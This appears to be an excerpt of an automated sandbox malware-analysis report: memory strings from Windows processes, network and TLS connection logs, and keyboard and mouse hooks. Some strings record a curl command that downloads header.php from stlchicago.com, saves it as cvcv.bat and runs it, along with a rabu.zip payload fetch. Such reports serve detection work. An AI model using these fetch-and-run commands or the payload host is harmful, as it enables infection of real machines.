Source: explorer.exe, 00000014.00000000.1343526292.000000000BCE6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD34000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD34000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comeru
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stacker.com/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stacker.com/politics/states-most-conservatives-0
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp, avutil-59.dll1.31.dr, avutil-59.dll.31.dr	String found in binary or memory: https://streams.videolan.org/upload/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wigreports.com/about/
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/32.dlllh
Source: explorer.exe, 00000014.00000000.1338126627.0000000008403000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.000000000842F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comLR
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.270towin.com/
Source: pnf1.dll0.31.dr	String found in binary or memory: https://www.catcert.cat/verCIT-10
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: hw.dll.31.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.financebuzz.com/clever-debt-payoff-55mp?utm_source=msn&utm_medium=feed&synd_slide=1&synd
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.forbes.com/sites/elanagross/2020/10/28/trump-administration-uses-philadelphia-protests-t
Source: client32.exe.31.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckho
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfim
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adehgvka4qgdcbt6kjgfejd54juq_1331/efniojlnjndmcb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adsyhmqqe7lu5n7nvusq66g3hutq_9834/hfnkpimlhhgiea
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ngifsy4k4mu7bcrdyhc4vjaocy_2025.4.2.0/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/autos/buying/if-your-old-car-has-any-of-these-16-problems-consider-buying-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/scientists-reveal-new-findings-about-older-adults-who-take-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/15-attributes-of-truly-good-men/ss-AA1hJKQY
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/there-are-8-types-of-intelligence-which-one-is-yo
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/if-any-of-these-11-things-describes-you-you-ve-climb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/george-santos-former-campaign-treasurer-pleads-guilty-to-fed
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/the-state-with-the-most-liberals-isn-t-userfornia-or-new-yor
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-asks-for-jan-6-dismissal-because-coup-attempt-was-part
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/the-most-stunning-space-images-captured-in-2023-so-far/ar-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/russian-official-proposes-invading-five-nato-countries/ar-AA1hJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/the-nobel-peace-prize-will-be-announced-in-oslo-the-laureate-is
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/
Source: explorer.exe, 00000014.00000003.1920095843.000000000BE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header
Source: curl.exe, 00000030.00000002.2173580798.000002428A570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172645632.000002428A5BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php$
Source: explorer.exe, 00000014.00000003.2021431230.0000000008547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20%26%26%20start%20/mi
Source: chrome.exe, 00000000.00000003.1693916175.0000742401E1C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20&&%20start%20/min%20
Source: curl.exe, 0000001B.00000002.1454082363.000001D0850F7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB967000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php-oC:
Source: curl.exe, 0000001B.00000002.1454082363.000001D085107000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php2
Source: curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php32
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpG
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpP
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpR
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpc
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpk
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpt
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: curl.exe, 0000001E.00000002.1476343582.0000020082823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb4v
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbDriverData=C:
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbLOCALAPPDATA=C:
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbWinsta0
Source: curl.exe, 0000001E.00000002.1476343582.0000020082819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb_L
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbcurl
Source: client32.exe, 00000020.00000003.1787909325.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbfC
Source: client32.exe, 00000020.00000003.1787909325.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1492177550.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1491464181.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbp
Source: curl.exe, 0000001E.00000002.1476343582.0000020082823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbpv
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.theatlantic.com/politics/archive/2014/02/the-origin-of-liberalism/283780/
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreport
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreportframe
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX$
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX(
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR(
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR34
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmin.js
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.css
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.csseHandleror
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.169:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49783 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global event hook (focus changed)

Source: C:\Windows\System32\osk.exe

Windows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL

Jump to behavior

Installs a global keyboard hook

Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4308 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4308 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6400 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6400 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
